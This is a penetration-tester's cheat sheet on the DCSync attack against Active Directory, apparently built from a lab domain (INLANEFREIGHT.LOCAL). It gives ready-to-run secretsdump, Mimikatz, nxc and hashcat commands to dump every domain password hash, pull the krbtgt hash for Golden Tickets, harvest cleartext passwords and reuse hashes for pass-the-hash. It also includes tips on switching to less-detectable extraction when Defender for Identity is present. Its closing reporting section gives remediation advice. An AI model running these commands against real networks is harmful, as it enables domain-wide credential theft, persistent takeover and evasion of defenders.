🛡️ Methodology Checklist
- Confirm user has DCSync rights:
Get-DomainUser [USER] | select objectsid+ BloodHound ACL check - DCSync from Linux:
impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm - DCSync from Windows (Mimikatz):
lsadump::dcsync /user:[DOMAIN]\[USER] - Dump all:
lsadump::dcsync /all /csv - Extract krbtgt hash for Golden Ticket
- Crack hashes offline:
hashcat -m 1000 hashes.txt [wordlist] - Use hashes for PtH or further lateral movement
🎯 Operational Context
Use when: Account with replication rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All) obtained — replicate NTLM hashes for any account including krbtgt.
Think Dumber First: nxc smb [DC] -u [USER] -p [PASS] --ntds or impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC] — DCSync impersonates a domain controller to request credential replication. Gets every hash in the domain in one command.
Skip when: Microsoft Defender for Identity is deployed — DCSync is heavily monitored; use VSS-based NTDS extraction instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
secretsdump.py -outputfile domain_hashes -just-dc [DOMAIN]/[USER]:[PASS]@[DC_IP] | Full NTDS dump via DCSync (Linux) |
secretsdump.py -outputfile domain_hashes -just-dc-user [DOMAIN]/[USER]:[PASS]@[DC_IP] [DOMAIN]\[TARGET_USER] | DCSync for a single user only |
runas /netonly /user:[DOMAIN]\[DCSYNC_USER] powershell | Spawn authenticated PS session as DCSync-capable user |
mimikatz # privilege::debug | Enable debug privilege in Mimikatz |
mimikatz # lsadump::dcsync /domain:[DOMAIN_FQDN] /user:[DOMAIN]\[TARGET_USER] | DCSync specific user via Mimikatz |
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl | Find accounts with reversible encryption (will yield cleartext) |
🔬 Deep Dive & Workflow
How DCSync Works
DCSync abuses the Directory Replication Service Remote Protocol (MS-DRSR). The attacker’s tool impersonates a Domain Controller and requests that the real DC replicate secret data (password hashes) — the same mechanism used for legitimate DC-to-DC replication. No code runs on the DC itself.
Required rights over the domain object:
DS-Replication-Get-ChangesDS-Replication-Get-Changes-All
Domain Admins and Enterprise Admins hold these rights by default. Misconfigured service accounts or users frequently inherit them — hunt via BloodHound (Outbound Control Rights → look for DCSync edges to non-DA users).
Linux — Impacket secretsdump.py
# Full NTDS dump — all users, all hashes
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT.LOCAL/adunn:SyncMaster757@172.16.5.5
# Single user (fast, low noise)
secretsdump.py -outputfile krbtgt_hash -just-dc-user INLANEFREIGHT.LOCAL/adunn:SyncMaster757@172.16.5.5 INLANEFREIGHT\krbtgtOutput files generated:
*.ntds— NTLM hashes for all user accounts*.ntds.kerberos— Kerberos keys*.ntds.cleartext— plaintext passwords (accounts with reversible encryption enabled)
Critical flags:
-just-dc— dump from NTDS.dit network replication (what you want)- Without
-just-dc, the tool attempts to dump local SAM hashes from the DC instead
Windows — Mimikatz
When operating from a compromised Windows host:
# 1. Spawn a shell in the context of the DCSync-capable user
runas /netonly /user:INLANEFREIGHT\adunn powershell
# 2. In the new window, run Mimikatz
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
# Get krbtgt hash for Golden Ticket creation
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\krbtgt/netonly flag: Authenticates to network resources as the specified user while keeping the current user’s local context. Required when the DCSync-capable account is not logged in interactively.
Reversible Encryption — Cleartext Harvest
Some accounts store passwords with reversible encryption for legacy application support. Find them before DCSync to know which accounts will yield plaintext:
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControlWhen secretsdump runs against these accounts, the DC’s Syskey is used to decrypt them — output appears in the .ntds.cleartext file.
Post-DCSync Priority Targets
| Target | Use Case |
|---|---|
administrator | Pass-the-Hash domain admin access |
krbtgt | Golden Ticket — persistent DA-equivalent access |
| All hashes | Offline cracking; lateral movement spray |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| DCSync returns ‘access denied’ | Missing replication rights | Verify: Get-DomainObjectAcl -Identity 'DC=domain,DC=com' | Where-Object {$_.IdentityReference -like '*[USER]*'} |
| impacket-secretsdump very slow | Large domain | Dump specific account: impacket-secretsdump -just-dc-user krbtgt [DOMAIN]/[USER]:[PASS]@[DC] |
| DCSync blocked by MDI/Defender | Behavioral detection | Switch to VSS shadow copy extraction: less detectable than DCSync |
| Hash returned but not valid | Wrong DC targeted | Specify -dc-ip [PRIMARY_DC]; replicate from primary DC for most up-to-date hashes |
| secretsdump returns NTLM format but mimikatz fails to use | Hash format difference | impacket format: LM:NTLM; for mimikatz use NTLM portion only (after :) for PtH |
📝 Reporting Trigger
Finding Title: DCSync Attack Replicates All Domain Credential Hashes Impact: DCSync replicates NTLM hashes for all AD accounts including krbtgt, enabling Golden Ticket creation for unlimited persistent domain access and Pass-the-Hash attacks against every account in the domain. Root Cause: Account with DS-Replication permissions compromised. DCSync not detected — no alerting on replication requests from non-DC sources. Recommendation: Remove unnecessary DS-Replication permissions. Deploy Microsoft Defender for Identity to alert on DCSync activity. After confirmed DCSync: reset krbtgt twice (24-hour interval), reset all compromised accounts, consider forest recovery.